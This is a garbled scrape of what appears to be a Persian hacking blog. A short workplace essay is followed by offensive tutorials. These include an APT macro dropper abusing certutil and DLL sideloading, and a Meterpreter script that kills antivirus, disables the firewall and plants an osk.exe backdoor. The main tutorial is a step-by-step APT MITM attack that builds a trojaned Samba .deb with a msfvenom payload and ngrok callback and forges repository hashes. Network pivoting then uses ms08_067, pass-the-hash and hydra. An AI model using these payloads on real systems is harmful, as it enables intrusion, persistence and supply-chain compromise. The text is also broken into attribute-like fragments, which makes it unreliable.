نمونهای=”” باشد.https:=”” www.youtube.com=”” watch?v=”WICq_Pj8ZUkاین” منفی=”” چنانچه=”” رهبر=”” سرپرست=”” میشود=”” وی=”” بهجای=”” 
رهبری=”” رئیس=”” بگیرد=”” ذیل=”” تفاوتهای=”” میکند.=”” تبدیل=”” قطعاً=”” ویژگیهای=”” نمود=”” فرصتهای=”” آتی=”” مطالبی=”” نوشتتوجه:=”” دادهشده=”” همان=”” اندک=”” متعهد=”” هستند،=”” نیز=”” نمیکند=”” است#آفت=”” ۲:=”” همکاران=”” رقیبانی=”” درستی=”” حرفهای=”” تلاشی=”” نمیتوانند=”” دیگران=”” باشند.در=”” شرکتها،=”” نهادهای=”” «مسابقه=”” خرسواری»=”” شفاف=”” مینماید,البته=”” گردد=”” کتاب=”” :«جامعه=”” شناسی=”” خودمانی»=”” حسن=”” نراقی=”” مفصل=”” پرداخته=”” خلاصه=”” وبنوشتم=”” ام(لینک).https:=”” ketabnak.com=”” merger.php?dlid=”9413میدانید” هیچگاه=”” خرسواری=”” »برگزار=”” نمیشود؟!=”” جانورشناسان،=”” اسبها=”” میدان=”” مسابقه=”” مستقیم=”” حرکت=”” نهتنها=”” مانع=”” تاختن=”” سایر=”” نمیشوند،=”” هرگاه=”” سوارکار=”” خودشان=”” بیفتد=”” بتوانند=”” سقوط=”” لگد=”” نمیکنند؛=”” خرها=”” میگیرند،=”” استارت،=”” اصلاً=”” توجهی=”” بهصورت=”” نداشته=”” خر=”” رقیب=”” جناح=”” چپ=”” راستش=”” دارد،=”” تمرکزش،=”” ممانعت=”” است!=”” هدفشان=”” رسیدن=”” شوند!=”” نرسند.=”” معناست=”” ناتوان=”” میدانند=”” نمیرسند،=”” سنگاندازی=”” مشکلات=”” چوب=”” لای=”” چرخ=”” گذاشتن،=”” بهانه=”” مختلف،=”” اهدافشان=”” میشوند=”” اصطلاح=”” میگویند:=”” «فلانی(reza=”” %98=”” lammer)،=”” انداخته=”” است».-#real=”” cyber=”” senariosدر=”” صفر=”” صد=”” #apts=”” چالشی=”” میخواهیم=”” طبق=”” تحلیلی=”” 38=”” fireeye=”” ساده.نکته=”” apts=”” طی=”” social=”” engineering=”” spear=”” email=”” phishing=”” منظور=”” میدانی=”” میاره=”” ایمیل=”” policy=”” نیروهای=”” عهده=”” آماری=”” رصدهای=”” اغلب=”” سناریویی=”” میبینند=”” ذهنیتی=”” مثالی=”” پلیس=”” کشوری=”” دهی=”” گزارش=”” رخداد=”” هکری=”” میدهد=”” مضمون=”” microsoft=”” word=”” documents=”” attach=”” فرستاده=”” غایب=”” جلوتر=”” میپردازم=”” بله=”” بدادم=”” برس=”” نوعی=”” خسارت=”” :))اکی=”” آنجای=”” پایه=”” بنا=”” زدید=”” macro=”” document=”” decetions=”” avs=”” قبلش=”” کجا=”” فهمیدیم=”” یکبار=”” تماس=”” fake=”” رسانی=”” باهاشون=”” ویندوزی=”” بنام=”” ویندوز,https:=”” certutilاین=”” certificate=”” command-line=”” encode=”” میخونه=”” منه=”” مهاجم=”” enable=”” vba=”” رفتیم=”” کنیدsub=”” 
objrun(commandmoveto=”” string,=”” copyto01=”” copyto02=”” cermovecomand=”” allusersprofile=”” string) dim=”” certutilcomand=”” stringcermovecomand=”cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp” objws=”CreateObject(“Wscript.Shell”)objws.Run” commandmoveto,=”” trueobjws.run=”” cermovecomand,=”” “padre1.txt=”” copyto01,=”” “padre2.txt=”” copyto02,=”” “padre3.txt=”” copyto03,=”” “esentutl.exe=”” d=”” “gup.exe”=”” o”,=”” “libcurl.dll”=”” “gup”=”” “.e”=”” “xe”,=”” falseobjws.run=”” “cmd.exe=”” f=”” q=”” “*.txt”,=”” falseend=”” sub (~0)در=”” شده,در=”” %temp%=”” tcm.tmp=”” certtutil.exe=”” pem=”” padre1-padre2-padre3=”” ۹=”” دیکد=”” شدc:\windows\system32\cmd.exe”=”” c:\programdata\padre1.txt=”” c:\programdata\\gup.txt=”” c:\windows\system32\cmd.exe”=”” c:\programdata\padre2.txt=”” c:\programdata\\libcurl.txt=”” c:\programdata\padre3.txt=”” c:\programdata\\3f2e3ab9=”” padre=”” شد,اما=”” gup.txt=”” libcurl.txt=”” generic=”” updater=”” notepad++=”” signature=”” libcurl.dll=”” لودر=”” مخرب=”” همچین=”” دیگری=”” extensible=”” storage=”” engine=”” esentutil.exe=”” support.microsoft.com=”” en-ae=”” help=”” 930832=”” support-for-the-esentutl-exe-tool-on-a-windows-server-2003-certificatiخب=”” gup.exe=”” 3f2e3ab9=”” decrypts=”” دیباگ=”” ntdll_ntsetinformationthread=”” مجهز=”” هستتمام=”” out=”” شلکدی=”” نهایتا=”” min=”” عملیاتی=”” خوشتون=”” امده=”” وقتشه=”” هوشیار=”” بشوند:)https:=”” www.bleepingcomputer.com=”” news=”” certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av=”” #blackhat=”” #roadmapنقشه=”” جایگاه=”” دارا=”” بود,همچنین=”” پیشگیری=”” کارآمدی=”” بود,این=”” نقشه=”” تدوین=”” است.آشنایی=”” ها.1.command-lines=”” *2.lpic=”” *آشنایی=”” مفاهیم=”” هک,شبکه=”” هکر.3.network=”” plus=”” *4.ceh=”” chfi=”” وب.5.html5=”” javascript=”” *6.php=”” asp=”” sql=”” *7.basic=”” *8.advanced=”” *طریقه=”” اجتماعی.9.osint=”” techniques=”” methodology=”” نویسی,ابزار=”” c&c.10.shell=”” scripting=”” *11.penetration=”” *12.basic=”” infrastructure=”” *13.metasploit=”” 
mastery=”” پایتون.14.python=”” hacker=”” bootcamp:=”” zero=”” hero=”” *زبان=”” ها.15.actionscript=”” persistence=”” غیره.16.pentesting=”” enterprise=”” *تکنیک=”” روشهای=”” pivoting.17.advanced=”” افزاری.18.social=”” physical=”” فضاء.19.advanced=”” wireless=”” سرشماری=”” ها.20.adaptive=”” avs.21.adversary=”” tactics:=”” گیرنده=”” فرستنده=”” رادیویی.22.software=”” defined=”” radio=”” اشیاء=”” استفاده.23.practical=”” iot=”” اسمبلی=”” زیرین=”” میباشد.24.assembly=”” فیزیکی=”” الکترونیکی.25.physical=”” electronic=”” control=”” کنترولر=”” scada=”” iot.26.assessing=”” exploiting=”” معکوس=”” بدافزار=”” نیاز.27.malware=”” analysis=”” crash=”” course=”” مختلف.28.practical=”” vulnerability=”” discovery=”” *آموزش=”” پردازنده=”” مبهم=”” سازی.29.the=”” shellcode=”” lab=”” *اکسپلویت=”” نفوذ.30.tactical=”” exploitation:=”” attacking=”” unix=”” اکسپلوت=”” ابری=”” azure.31.aws=”” azure=”” مموری.32.in-depth=”” attackers=”” ids,ips,siems.33.dark=”” side=”” ops-custom=”” افزاری.34.hacking=”” firmware=”” hardware=”” لازمه=”” قبیل=”” windbg.35.windows=”” primer=”” آن.36.windows=”” rootkit=”” net.=”” detections.37.dark=”” ops=”” 2-adversary=”” simulation=”” arm=”” آن.38.arm=”” laboratory:=”” intro=”” ios=”” android.39.offensive=”” mobile=”” reversing=”” دفاعی.40.the=”” automation=”” *#help=”” u:warning:گزینه=”” ستاره=”” واجب=”” هستند.:anger:برای=”” ذکر=”” کافیست=”” blackhat=”” گوگل=”” دید,:warning:=”” نکته:=”” موارد=”” قبلی=”” زیرمجموع=”” ها,در=”” شد,:anger:برای=”” یادگیری=”” میتوانید=”” اصولی=”” هزینه=”” ناچیز=”” آغاز=”” ربات=”” مراجعه=”” عضویت=”” ۱۰۰=”” تومان=”” میباشد.#post=”” windowsدر=”” حرکاتی=”” آوریم.=”” ت=”” کارشناسان=”” امنیتی=”” اذعان=”” دسترس=”” عموم=”” قربانیان=”” برخوردار=”” مسلط=”” بتونید=”” section=”” encryption=”” pack=”” رایجی=”” موجوده=”” ریشه=”” بپردازیم=”” دستوراتی=”” prompet=”” مشکوک=”” hashdump=”” sam=”” میکنند,خب=”” حل=”” موجود=”” رفع=”” باشه,برای=”” خوراندن=”” 406=”” میگیریم,open=”” terminal1.touch=”” auto.rc=”” addedrun=”” getgui=”” 00980098=”” execute=”” -h=”” 
cmd.exe=”” net=”” grant:everyone,full”=”” reg=”” createkey=”” hklm\\software\\microsoft\\windows\=”” nt\\currentversion\\image\=”” file\=”” execution\=”” options\\osk.exe=”” debugger=”” reg_sz=”” “c:\windows\system32\cmd.exe”=”” pkill=”” msseces.exe=”” bypassuac=”” technique=”PSH” priv_migrate=”” getprivs=”” getsystem=”” local_exploit_suggester=”” gather=”” checkvm=”” killav=”” netsh=”” opmode=”” mode=”disable”” advfirewall=”” allprofiles=”” off”=”” product=”” where=”” uninstall=”” nointeractive’=”” show=”” profiles”=”” profile=”” background=”” enter2.msfconsole=”” auto.rc;set=”” x86=”” call4_dword_xor;set=”” درایو=”” osk.exe=”” فشردن=”” virtual=”” بستن=”” uac=”” nt=”” thread=”” vm=”” مجازی=”” antivirus=”” disable=”” kaspersky=”” دیفندر=”” دیدن=”” برمیگرده=”” meterpreter.–#hta to=”” whitelistingمیخوام=”” سرتون=”” بندازم=”” گیجی=”” عشق=”” بطوری=”” کنیم,موضوع=”” پست… #integer=”” overflowدر=”” همانند=”” میباشند=”” میباشد.برای=”” میبایست=”” ++c=”” datatype=”” چارت=”” کنیدdatatypes(default=”” signed)int=”” #=”” byte-16=”” 32=”” bit=”” (-32767=”” 32767)=”” (-2^32=”” 2^32)=”” short=”” long=”” float=”” (a=”” 10’7)=”” double=”” 64=”” 10’15)=”” bool=”” (0=”” 1)=”” datatypes(undefault=”” unsigned)unsigned=”” (65535)=”” (2^64)=”” 10’14)=”” 10’30)=”” byte=”” اشغال=”” نگه=”” اعداد=”” صحیح=”” اکثر=”” بازه=”” متغیرها=”” 32767=”” مثبت=”” بتوان=”” foat-double-char=”” foat=”” اعشاری=”” هفت=”” رقم=”” اعشار=”” پانزده=”” متنی=”” #نکته=”” حائز=”” اهمیت=”” signed=”” میشوند=”” منهی=”” پوشش=”” میده,اما=”” عبارت=”” ببریم=”” نمیکنه=”” 65535=”” false=”” خودمونه=”” شده#include=”” “stdafx.h”=”” <iostream>=”” using=”” namespace=”” std;=”” 1;=”” cout=”” <<=”” endl;=”” متغیر=”” !!!=”” میکرده=”” خرتناق=”” ,حالا=”” تفاسیر=”” اتفاقی=”” افته؟!=”” بلی=”” سرریز=”” اومدم=”” قاعدتا=”” بعلاوه=”” 65536=”” درسته=”” کمال=”” تعجب=”” برمیگردونه!!!=”” integer=”” overflow=”” اندروید=”” سابقه=”” exploit-db=”” مخصوصا=”” مفسرهای=”” فرمتاش=”” mp4=”” audio=”” گرا=”” ندم=”” کد:0=”” any=”” fa.wikipedia.org=”” 
سرریز_عدد_صحیحhttps:=”” www.exploit-db.com=”” 40436 اما=”” کدی=”” ناشناس=”” ؟؟=”” بشناسیم=”” ابعاد=”” رو,خب=”” عملگرهای=”” پیداس=”” معنیه=”” عملگرها=”” محاسباتی=”” بدن=”” دویی=”” محاسبه=”” binary=”” [00000111]=”” [00000101]=”” b;=”” 00000111=”” 00000101=”00000101″ [5]=”” d;=”” [7]=”” g=”7;” h=”5;” j=”g” ^=”” h;=”” [2]=”” محاسبات=”” عملگر=”” (&)=”” میشود,اگر=”” عملکردهای=”” معادله=”” دوییش=”” ?!=”” معادلات=”” قانون=”” اجزای=”” نظیر=”” میکنیم,با=”” زیرجمع=”” هستش,بنابر=”” مقدارهای=”” ده=”” میباشد,اما=”” یای=”” بیتیست=”” ورتیکال=”” (|)=”” عمگر=”” میشه,یک=”” منطق=”” معادلیه=”” 1برابر=”” مساوی=”” بود.و=”” xor=”” انحصاری=”” علامت=”” کَرت=”” (^)=”” قوانینی=”” 00000010=”” آمد,خب=”” فهمیدن=”” پتانسیل=”” کاراکترهای=”” ()createremotethread=”” tid=”” کانکشن=”” نکردن=”” مصنوعی=”” میداره:)=”” نیست…خروجی=”” کد5=”” bitwise_operations_in_c-#recursive=”” functionنکته=”” کرش=”” نمی=”” شوند.-مفهوم=”” recursive=”” بیانگر=”” گنجانده=”” است,برای=”” میزنم:open=”” recursive.cpp=”” a(int=”” _x)=”” _x=”” _a(_x=”” 1);=”” _a(1);=”” prompt=”” ()a=”” درش=”” کل=”” واحد=”” میشه,باز=”” ()main=”” اختصاص=”” انتظار=”” بدلیل=”” ی=”” نا=”” متناهی=”” کاسته=”” کنه,خب=”” 240=”” oriented=”” مدت=”” بشه,تکنیک=”” انداختن=”” بدیم؟؟؟=”” ابتدا=”” مبتنی=”” ida=”” pro=”” پرشی=”” .text=”” assembly=”” hexadecimal=”” rce=”” منتظر=”” بشه,توضیحات=”” تئوری=”” تولید=”” کرد2.g++=”” 3.objdump=”” contents=”” .text:=”” 1080=”” 31ed4989=”” d15e4889=”” e24883e4=”” f050544c=”” 1.i..^h..h…ptl=”” 1090=”” 8d05ea01=”” 0000488d=”” 0d830100=”” 00488d3d=”” ……h……h.=”10a0″ 02010000=”” ff15362f=”” 0000f40f=”” 1f440000=”” ……6=”” …..d..=”” 10b0=”” 488d3d91=”” 2f000048=”” 8d058a2f=”” 00004839=”” h.=”./..H…/..H9″ 10c0=”” f8741548=”” 8b050e2f=”” 00004885=”” c07409ff=”” .t.h…=”” ..h..t..=”” 10d0=”” e00f1f80=”” 00000000=”” c30f1f80=”” …………….=”” شو=”” objdump=”” نمیزارم,خب=”” hex=”” machine=”” درمیاریم=”” صورت4.nano=”” grep.txt=”” 
added31ed4989d15e4889e24883e4f050544c8d05ea010000488d0d83010000488d3d02010000ff15362f0000f40f1f440000488d3d918d355a2f00004829=”” ………..=”” enter5.sed=”” ‘s=”” \(..\)=”” \\x\1=”” g’=”” cat=”” \x31\xed\x49\x89\xd1\x5e\x48\x89\xe2\x48\x83\xe4\xf0\x50\x54\x4c\x8d\x05\xea\x01\x00\x00\x48\x8d\x0d\x83\x01\x00\x00\x48\x8d\x3d\x02\x01\x00\x00\xff\x15\x36\x2f\x00\x00\xf4\x0f\x1f\x44\x00\x00\x48\x8d\x3d\x91\x8d\x35\x5a\x2f\x00\x00\x48\x29=”” آمادس=”” توابع_بازگشتی#apt=”” mitm=”” package=”” (linux=”” attack)در=”” مدرن=”” تری=”” حوضه=”” مرد=”” میانی=”” طولانی=”” مبحث=”” میشه. خب=”” کمي=”” توضيح=”” ميدم=”” اين=”” سناريو=”” فضاهايي=”” باهاش=”” درگير=”” خواهيم=”” شد,سناريو=”” روي=”” سيستم=”” هاي=”” لينوکسي=”” اينه=”” براي=”” قرباني=”” يک=”” آپديت=”” جعلي=”” کنيم=”” مکانيزم=”” آپگريد=”” اتوماتيک=”” پايلود=”” غالب=”” فايل=”” deb=”” پکيج=”” نهايتا=”” دسترسي=”” ميشود,اما=”” اي=”” ميبايست=”” يا=”” tool=”” بشناسيم=”” بدونيم=”” جديد=”” ميشه=”” ميده=”” ميکنه=”” رساني=”” پروتکلي=”” بررسي=”” تصديق=”” بود,خب=”” زماني=”” ميخوايد=”” ليست=”” بگيره=”” واقع=”” webserver=”” داراي=”” امضاي=”” gpg=”” پيدا=”” مجوز=”” فايلي=”” meta-data=”” مطمئن=”” تعريف=”” دارهخب=”” تفاسير=”” ميتونه=”” بگيره؟=”” اينطور=”” بدليل=”” اختيار=”” release.gpg=”” inrelease=”” packages=”” ميتونيم=”” هويت=”” جعل=”” قالبا=”” spoof=”” گفته=”” محلي=”” پياده=”” سازي=”” بديم=”” خواست=”” قرباني,اما=”” روشي=”” wan=”” vpn=”” tunnling=”” شدني=”” نياز=”” داريم=”” آسيب=”” پذيري=”” سرويس=”” بخوره=”” hosts=”” modify=”” نفع=”” هکراکي=”” عملياتي=”” lan=”” ميکنيم=”” دومي=”” ميپردازيم=”” ديگه=”” کالي=”” لينوکس=”” طرح=”” ريزي=”” بتونن=”” بلا=”” بيارن=”” ,مرحله=”” بايد=”” برخي=”” ضمن=”” يعني=”” کالي1=”” کالي2=”” ميکنمopen=”” -y;apt-get=”” tor;gem=”” bettercap;service=”” start;service=”” start;noip2=”” اينجا=”” ابزارهارو=”” کرديم2.proxychains=”” 837e11a7.ngrok.io=”” ->=”” localhost:80copy=”” (ngrok-url)و=”” ميگيريم=”” طريقه=”” نصبش=”” 156=”” نوت=”” پد=”” ذخيره=”” کنيدopen=”” tab3.proxychains=”” |dns-response|=”” ftp.free.fr=”” 212.27.60.270%=”” 
[connecting=”” (212.27.60.27)]<><>-okget:1=”” pub=”” kali-rolling=”” [30.5=”” kb]get:2=”” amd64=”” [17.0=”” mb]در=”” proxychains=”” آي=”” پي=”” اسمه=”” zone=”” پيشنهاد=”” بياريم,اکي=”” ميريم=”” ميکنيمvisit=”” (inrelease)=”” dists=”” inreleasevisit=”” (main=”” packages)=”” binary-amd64=”” packages4.wget=”” inrelease;wget=”” release.gpg;wget=”” کانفيگ=”” spoofing=”” اسکريپت=”” عمليات=”” معرفي=”” بدونه=”” ميخواد=”” کنه-#ngrok bypass=”” میده… 5.nano=”” dns.conf=”” added=”” (apt=”” dns)#=”” lines=”” will=”” be=”” ignored.=”” redirect=”” *.google.com=”” attacker=”” .*google\.com=”” .*kali\.download=”” .*ftp.free\.fr=”” .*http.kali\.org=”” *.microsoft.com=”” 10.10.10.10=”” .*microsoft\.com=”” enter6.bettercap=”” (taeget)=”” –dns=”” tabباز=”” کاري=”” نداريم=”” مناسب=”” bind=”” بارگزاري=”” کنيم7.dpkg=”” -l=”” samba=”” ii=”” 2:4.9.4+dfsg-2=”” smb=”” cifs=”” file,=”” print,=”” login=”” unixsearch=”” (name=”” version)=”” find=”” s8.wget=”” samba_4.9.4%2bdfsg-2_amd64.deb;mkdir=”” dpkg-deb=”” samba_4.9.4+dfsg-2_amd64.deb=”” rm=”” 64bit9.msfvenom=”” xor_dynamic=”” “\x00″=”” elf=”” ######.elf32bit9.msfvenom=”” call4_dword_xor=”” ######.elf=”” باشيد=”” حسب=”” معماري=”” پردازشي=”” nmap=”” شناسايي=”” ميسازيم=”” اکي=”” اسکريپتي=”” تزريق=”” بسازيم=”” دانلودش=”” کردم10.nano=”” sbin=”” samba_update=”” (ngrok-url)#!=”” 74c8be81.ngrok.io=”” 700=”” enterخب=”” پايلودي=”” دايرکتوري=”” پاک=”” مياره11.chmod=”” samba_update;sed=”” dpkg-maintscript-helper=”” rm_conffile=”” etc\=”” init\=”” smbd.conf=”” \crontab=”” cat;=”” “*=”” “;=”” crontab=”” -‘=”” postinst=”” 12.head=”” 5;sed=”” ‘s#version:=”” 2:4.9.4+dfsg-2#version:=”” 2:4.9.4+dfsg-3#g’=”” control;dpkg-deb=”” samba_4.9.4+dfsg-3_amd64.deb=”” package:=”” sambaversion:=”” 2:4.9.4+dfsg-2architecture:=”” amd64maintainer:=”” maintainers=”” <pkg-samba-maint@lists.alioth.debian.org>installed-size:=”” 15960copy=”” (version)حالا=”” ميايم=”” بياره=”” 11=”” decompile=”” کنیم,حالا=”” اطلاعاتي=”” samaba=”” metadata=”” ويرايش=”” قرياني=”” مطلع=”” 
موجوده,البته=”” اینو=”” 2:4.9.4+dfsg-3=”” فیک=”” درج=”” تحریک=”” بروزرسانی=”” شود13.apt-cache=”” 30=”” “2:4.9.4+dfsg-2″=”” sha256;apt-cache=”” sha1;apt-cache=”” md5sum;apt-cache=”” filename:=”” sha256:=”” 4c1c8ef271b2de10abe7549111d73f259f06cc0dd791307d208647b4699a4127sha1:=”” 8bb74018fa5d65bc54cd32c4d4638082f39bf96amd5sum:=”” 54a2a8c7dfd60be3a1ef3731b9a0795ffilename:=”” samba_4.9.4+dfsg-2_amd64.debcopy=”” (sha1)در=”” بيرون=”” ميکشيم=”” recompile=”” تغيير=”” اصلي=”” “(version)”=”” ورژني=”” کشيديم=”” بزاريم=”” 14.cat=”” lists=”” http.kali.org_kali_dists_kali-rolling_main_binary-amd64_packages=”” “8bb74018fa5d65bc54cd32c4d4638082f39bf96a”=”” packages;echo=”” **original=”” deb**;cat=”” version:;cat=”” size:;cat=”” sha256:;cat=”” sha1:;cat=”” md5sum:;=”” original=”” debversion:=”” 2:4.9.4+dfsg-2installed-size:=”” 15960size:=”” 1078604sha256:=”” 54a2a8c7dfd60be3a1ef3731b9a0795fحالا=”” sha1=”” آوردیم=”” 15.echo=”” **torjan=”” deb**;echo=”” %sha1%;sha1sum=”” samba_4.9.4+dfsg-3_amd64.deb;echo=”” %sha256%;sha256sum=”” %md5%;md5sum=”” %size%;ls=”” -la=”” torjan=”” deb%sha1%84156e3c5e393c1269d3e9b840127af146603312=”” samba_4.9.4+dfsg-3_amd64.deb%sha256%70068b2d1195c9870d47aa0a3d16b1c2356d0a524ad375f9dc2fa4601e1fba89=”” samba_4.9.4+dfsg-3_amd64.deb%md5%fc778c1fc5385e31dd908ead3f885215=”” samba_4.9.4+dfsg-3_amd64.deb%size%-rw-r–r–=”” 1079436=”” jan=”” 23:55=”” samba_4.9.4+dfsg-3_amd64.debcopy=”” (sha1-sha256-md5-size)خب=”” اثر=”” وبسرورهای=”” installer=”” اصلی,=”” جدیده=”” حتمی=”” ماهیت=”” داداشم=”” جیگر:))=”” درضمن=”” هشدار=”” بدهاما=”” کشیدم=”” واضح=”” size,md5,sha1,sha256=”” sed=”” صورته=”” old=”” filename=”” میشه16.sed=”” version:=”” packages;sed=”” 4c1c8ef271b2de10abe7549111d73f259f06cc0dd791307d208647b4699a4127=”” 7a14cfa2a7e86eb70a6edc9b47b8ca82c959106807ecd6bd7ff417777467d2ec=”” sha1:=”” 8bb74018fa5d65bc54cd32c4d4638082f39bf96a=”” eb2d9ef0d9470a3b788fdccfee2ca100a0d058e8=”” md5sum:=”” 54a2a8c7dfd60be3a1ef3731b9a0795f=”” 9dc425a606bff33660f4a44377300810=”” size:=”” 
1078604=”” 1079368=”” سایز=”” میدیم,حالا=”” package.gz=”” بسازیم=”” 17.gzip=”” packages.gz=”” بیاریم:) 18.echo=”” pakages**;cat=”” pakages6133b46b0366171c54067dd9f90cdda6=”” 65572968=”” packagese35a44c98b4de5e20ef8218ef7877c86=”” 17012079=”” packages.gzbaa080a6a93df4d166624fb8e3b88c272b51ae01=”” packages7f66a18da6deab76e6fc46668c7eb5869a1376b6=”” packages.gza36ce2630f62147e2890bedd5db9742da449089eab4b19ef147643b42f97915b=”” packages059e7c9876e12239bb0e4ed4935039fe2d43e590e565ee3eaf48644cdf91a77c=”” packages.gzخب=”” inrealase=”” مطابق=”” میکشیم19.echo=”” **trojan=”” pakages**;md5sum=”” packages*;=”” sha1sum=”” sha256sum=”” packages*;ls=”” packages*=”” pakages7b93d917cbd06f9edd65a3c8e4cf0b9c=”” packages07c73c77dd7a352b7b5daf146b1fcfea=”” packages.gz0b024f35fd88e08f6f0f96ce1353ce1dbdc09b68=”” packagescf2b36c6870858a8213bbc64152d1b7fe5c09a33=”” packages.gzd0124eb92cb4e395b31bcd751389ac8de017cfb25c8acdacec1aa0bee06ebff0=”” packages812b00138fd0b3fc9e679acfe436ec791b93046ff04ad36007b43a201adc4eba=”” packages.gz-rw-r–r–=”” 2447=”” 21:14=”” packages-rw-r–r–=”” 1309=”” 21:26=”” کشیدیم=”” کنیمmd520.sed=”” ‘s#6133b46b0366171c54067dd9f90cdda6=”” packages#7b93d917cbd06f9edd65a3c8e4cf0b9c=”” packages#g’=”” inrelease;sed=”” ‘s#e35a44c98b4de5e20ef8218ef7877c86=”” packages.gz#07c73c77dd7a352b7b5daf146b1fcfea=”” packages.gz#g’=”” sha121.sed=”” ‘s#baa080a6a93df4d166624fb8e3b88c272b51ae01=”” packages#0b024f35fd88e08f6f0f96ce1353ce1dbdc09b68=”” ‘s#7f66a18da6deab76e6fc46668c7eb5869a1376b6=”” packages.gz#cf2b36c6870858a8213bbc64152d1b7fe5c09a33=”” sha25622.sed=”” ‘s#a36ce2630f62147e2890bedd5db9742da449089eab4b19ef147643b42f97915b=”” packages#d0124eb92cb4e395b31bcd751389ac8de017cfb25c8acdacec1aa0bee06ebff0=”” ‘s#059e7c9876e12239bb0e4ed4935039fe2d43e590e565ee3eaf48644cdf91a77c=”” packages.gz#812b00138fd0b3fc9e679acfe436ec791b93046ff04ad36007b43a201adc4eba=”” نه23.echo=”” **modifying=”” modifying=”” برگردیم=”” samba.deb=”” کنیم 24.mkdir=”” pub;chmod=”” pub;mkdir=”” kali;chmod=”” 
kali;mkdir=”” dists;chmod=”” dists;mkdir=”” kali-rolling;chmod=”” kali-rolling;mkdir=”” main;chmod=”” main;mkdir=”” binary-amd64;chmod=”” binary-amd64;mkdir=”” pool;chmod=”” pool;mkdir=”” s;chmod=”” s;mkdir=”” samba;chmod=”” همگی=”” هستند25.ls=”” samba_4.9.4+dfsg-3_amd64.debاکی=”” روتین=”” کردش=”” شد26.mv=”” ;mv=”” کارها=”” recovery=”” console=”” بنویسم=”” کارهایی=”” مخازن=”” محلی=”” جوابگو=”” اطاعات=”” مفیدی=”” بیاریمwan=”” spoofing27.ping=”” ping=”” (52.14.61.47)=”” 56(84)=”” bytes=”” data.copy=”” (ip-ngrok)28.nano=”” general=”” remmina_creds=”” wlan_geolocate=”” ssh_creds=”” filezilla_client_cred=”” sshkey_persistence=”” busybox=”” smb_share_root=”” passwords=”” cookies=”” enterو=”” لیستینگ=”” metasploit29.msfconsole=”” 4141;set=”” auto.rc;exploit=”” blog.packagecloud.io=”” eng=”” 2018=”” 02=”” 21=”” attacks-against-secure-apt-repositories=”” 2014=”” 28=”” howto-gpg-sign-verify-deb-packages-apt-repositories=”” 2015=”” inspect-extract-contents-debian-packages=”” askubuntu.com=”” questions=”” 253728=”” how-to-safely-download-and-gpg-verify-a-debian-source-packagehttps:=”” secureapt#how_to_manually_check_for_package.27s_integrityhttps:=”” secureapt#signed_release_fileshttps:=”” www.offensive-security.com=”” metasploit-unleashed=”” binary-linux-trojan=”” www.debian.org=”” doc=”” manuals=”” debian-faq=”” ch-pkg_basics.en.html#pivoting=”” networkیکی=”” محبوب=”” تکنیکی=”” pivot=”” معنای=”” کامپیوتری=”” کامپیوتر=”” کامپیوترها=”” پتانسیلش=”” باشه…-شاید=”” سوال=”” کرد؟=”” هستش,اسم=”” pivoting=”” کنید,اما=”” ؟؟؟=”” بشیم,اولین=”” 1.1.1.2=”” 1.1.1.3=”” 1.1.1.4=”” تعاریف=”” routing=”” بکنیم=”” باشیم,با=”” authentication=”” authen=”” ممکنه=”” بازم=”” امیدی=”” کلا=”” pentest=”” بدنبال=”” راهی=”” تکنیکopen=”” instagram.fdoh5-1.fna.fbcdn.net=”” vp=”” 5bc514123eae6757f2d7e151e342fcfc=”” 5cff4e6e=”” t51.2885-15=”” e35=”” 49351811_242625999982906_5514895558731009107_n.jpg?_nc_ht=”instagram.fdoh5-1.fna.fbcdn.net” ######.jpg=”” 2.sed=”” socks4=”” 127.0.0.1=”” 9050=”” #socks4=”” 
proxychains.conf;echo=”” “socks4=”” (wan)=”” 1080″=”” >>=”” proxychains.conf=”” 3.nano=”” getuid=”” autoroute=”” subnet=”10.10.10.0/24″ auxiliary=”” socks4a=”” enum_computers=”” tcpnetstat=”” smart_hashdump=”” scanner=”” portscan=”” tcp=”” threads=”50″ rhosts=”10.10.10.0/24″ proxies=”SOCKS4:(WAN):1080″ set_wallpaper=”” wallpaper_file=”######.jpg” enter4.msfconsole=”” ms08_067_netapi;set=”” rhost=”” (target);set=”” دیفیس=”” پروکسی=”” رانژه=”” socks=”” مستقیمی=”” rc=”” امدم=”” عاملش=”” رنج=”” 10.10.10.0=”” 24 خب=”” متونم=”” بگیرم=”” نمیتونستم=”” انجاس=”” گرفتن,اما=”” میکشم=”” مثللا=”” بگیرم:)5.msfconsole=”” psexec;set=”” bind_tcp;set=”” smbuser=”” administrator;set=”” smbpass=”” (hash);set=”” 6.proxychains=”” –osscan-guess=”” -sv=”” -st=”” -sc=”” -pn=”” (target)7.run=”” ssh=”” ssh_enumusers=”” user_file=”/usr/share/metasploit-framework/data/wordlists/default_users_for_services_unhash.txt” (user)open=”” tab8.proxychains=”” hydra=”” (target)=”” 22=”” (user)=”” wordlists=”” default_pass_for_services_unhash.txt=”” 9.proxychains=”” (user)@(target)(pass)back=”” tab10.portfwd=”” 8080=”” (target)open=”” tab11.nikto=”” -useproxy=”” (wan):8080=”” browser=”” (wan):8080در=”” گفنیم=”” پذیریی=”” سیع=”” بکشیم=”” ندارم=”” سومی=”” localhost=”” اصل=”” منوال=”” میتونم=”” اسکنش=”” 11و=”” route=”” میسازند=”” بندازید=”” ا=”” bridge=”” بگیرند=”” dhcp=”” دومی=”” tunnel=”” proxy=”” میدونند=”” برقراره=”” بگونه=”” tunneling=”” محقق=”” میتوند=”” اقدام=”” پین=”” دادم….avihttps:=”” reading-room=”” whitepapers=”” paper=”” 33909https:=”” pentest.blog=”” explore-hidden-networks-with-double-pivoting=”” -#operator=”” overloading=”” (obfuscation)در=”” سربار=”” گزاری=”” سربارگزاری=”” سازی… استفاده=”” جنس=”” کلاسی=”” ()######=”” private=”” هستش,همچنین=”” سازنده=”” کردیم,علاوه=”” بخواد=”” بسازه,حالا=”” (-)=”” برخلاف=”” default=”” تفریق=”” operator=”” ماموریتش=”” میشود=”” اونچه=”” دیدنش=”” استنباط=”” رفتار=”” heuristic=”” موتور=”” بخورن؟=”” اذیتشون=”” کنیم–=”” decryption=”” loop=”” detected–=”” reads=”” 
